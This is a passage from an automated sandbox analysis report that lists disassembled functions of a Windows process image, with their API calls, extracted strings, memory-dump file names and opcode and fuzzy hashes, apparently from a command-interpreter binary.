                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                                                                        • String ID: A
                                                                                                                                                                        • API String ID: 3731854180-3554254475
                                                                                                                                                                        • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                                                                        • Instruction ID: 0295f1f323de2dd52e52ddd8509302006aef7f17d40aea1841651220a9810db5
                                                                                                                                                                        • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                                                                        • Instruction Fuzzy Hash: 85A179B3909682C6E7209F61A45437DB7A0FF49790F008135DA8D87795EF3EE859CB0A
                                                                                                                                                                        Function 00007FF6E944A58C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97memoryfileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                                                                                                                        • String ID: PE
                                                                                                                                                                        • API String ID: 2941894976-4258593460
                                                                                                                                                                        • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                                                                                        • Instruction ID: 32f4d8a42bd1011fea8040cdf475efe36591b3ca8cd0e2f2818bded6e0f1d897
                                                                                                                                                                        • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                                                                                        • Instruction Fuzzy Hash: 40413262A08651D6EB209F51E410379BBE0FF89B90F448230DE5D86B95DF3EE44ACF06
                                                                                                                                                                        Function 00007FF6E9449B0C Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 261registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Enum$Openwcsrchr
                                                                                                                                                                        • String ID: %s=%s$.$\Shell\Open\Command
                                                                                                                                                                        • API String ID: 3402383852-1459555574
                                                                                                                                                                        • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                                                                        • Instruction ID: 9c6e238f07f120f9c37ef0aba21584a856fe203490298f3760e695a72d79fa38
                                                                                                                                                                        • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                                                                        • Instruction Fuzzy Hash: 6CA1D563A08642C2EE209F55D4103B963A0FF85F90F904531DA4D877C4EF7EE94ADB0A
                                                                                                                                                                        Function 00007FF6E942F173 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • iswdigit.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F0D6
                                                                                                                                                                        • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF6E942E626,?,?,00000000,00007FF6E9431F69), ref: 00007FF6E942F1BA
                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F1E7
                                                                                                                                                                        • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF6E942E626,?,?,00000000,00007FF6E9431F69), ref: 00007FF6E942F1FF
                                                                                                                                                                        • iswdigit.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F2BB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: iswdigit$iswspacewcschr
                                                                                                                                                                        • String ID: )$=,;
                                                                                                                                                                        • API String ID: 1959970872-2167043656
                                                                                                                                                                        • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                                                                                        • Instruction ID: bced797ef8aaf701db302e535f7259d5add735f7a748c36dbd60f535f1d3421f
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                                                                                        • Instruction Fuzzy Hash: EA418763E08656C6FB648F11A91437926A0BF12751FC45071CE89C36A4DF3EA8C9CB0A
                                                                                                                                                                        Function 00007FF6E944BA40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                                                                                                                        • String ID: %04X-%04X$:
                                                                                                                                                                        • API String ID: 930873262-1938371929
                                                                                                                                                                        • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                                                                        • Instruction ID: f771fb9a206d89ed07e728582aba313c4fa3f57fe4d45a320697e07c221ef564
                                                                                                                                                                        • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                                                                        • Instruction Fuzzy Hash: 2A416033A08A82D2EB209F60E4543BA62A0FF84B55F408135EA4DC37D5DF7ED549CB1A
                                                                                                                                                                        Function 00007FF6E94336EC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                                                                                        • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                                                                        • API String ID: 3249344982-2616576482
                                                                                                                                                                        • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                                                                        • Instruction ID: afd473c8b172a1a6a0acfaa2e4c080aafd8906148edc118c83226cbad4888695
                                                                                                                                                                        • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                                                                        • Instruction Fuzzy Hash: 9C413CB3A18B41C6E3108F22A84436ABAA4FF99FD4F448234DE4987794DF3ED058CB05
                                                                                                                                                                        Function 00007FF6E94386F0 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1313749407-0
                                                                                                                                                                        • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                                                                                        • Instruction ID: 65ffbba6bddd6c846dbc08954bbfcf9ede96746683c7cd5330bc8be1b6c92710
                                                                                                                                                                        • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                                                                                        • Instruction Fuzzy Hash: 3A519123A08682C2EB14DF3198083BDA691BF49B90F585230DD1E877D5EF3EE449C70A
                                                                                                                                                                        Function 00007FF6E9425984 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E9443687
                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6E942260D), ref: 00007FF6E94436A6
                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6E942260D), ref: 00007FF6E94436EB
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E9443703
                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6E942260D), ref: 00007FF6E9443722
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Console$Write_get_osfhandle$Mode
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1066134489-0
                                                                                                                                                                        • Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                                                                                                                        • Instruction ID: e88c57aec55ef78da04ba9b645456917f9a82f17653d9bc3f6a43ac7635f2f28
                                                                                                                                                                        • Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                                                                                                                        • Instruction Fuzzy Hash: C2519363B08642D7EB249F21960477AA691FF44B90F088435DE4EC7790EF3EE449CB0A
                                                                                                                                                                        Function 00007FF6E9433578 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E9433584
                                                                                                                                                                        • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E943359C
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335C3
                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335D9
                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335ED
                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E9433602
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 513048808-0
                                                                                                                                                                        • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                                                                                        • Instruction ID: 6d89b331c714036a7180df0c3f0021553935c5f3d4206415e7aa102b74b4b422
                                                                                                                                                                        • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                                                                                        • Instruction Fuzzy Hash: D1115433A08646C6E7248F74A5882786A90FF59B65F549334DD2F827D0DE3ED44CC706
                                                                                                                                                                        Function 00007FF6E9439584 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4104442557-0
                                                                                                                                                                        • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                                                                                        • Instruction ID: 9378786cca3953a8bd63b0058cb05f6ae3d6f9ca2c5b407d64a02f3d10836d89
                                                                                                                                                                        • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                                                                                        • Instruction Fuzzy Hash: 31112122A05B42CBEB00DFB4E8442A833A4FF59758F400A34EA6D87B54EF7DD5A9C345
                                                                                                                                                                        Function 00007FF6E942E260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: iswdigit
                                                                                                                                                                        • String ID: GeToken: (%x) '%s'
                                                                                                                                                                        • API String ID: 3849470556-1994581435
                                                                                                                                                                        • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                                                                        • Instruction ID: 38e1565347d210376ff9ddeae28bee47200d3431c281a82e85d4042e67bc2b76
                                                                                                                                                                        • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                                                                        • Instruction Fuzzy Hash: 77516333A08646C5EB209F66A44837A77A0FF44B14F508435DA4DC3390EF7EE888C71A
                                                                                                                                                                        Function 00007FF6E943417C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentDirectorytowupper
                                                                                                                                                                        • String ID: :$:
                                                                                                                                                                        • API String ID: 238703822-3780739392
                                                                                                                                                                        • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                                                                        • Instruction ID: 82d12ce4bf942a1684c69ba2ab26bc134c6926f5cfbca28edf2385294d2a7428
                                                                                                                                                                        • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                                                                        • Instruction Fuzzy Hash: DB11E253609741C6EB2ACF71A819379B6A0EF49B99F498132DD0D87790DF3DE049C70A
                                                                                                                                                                        Function 00007FF6E9435EE4 Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
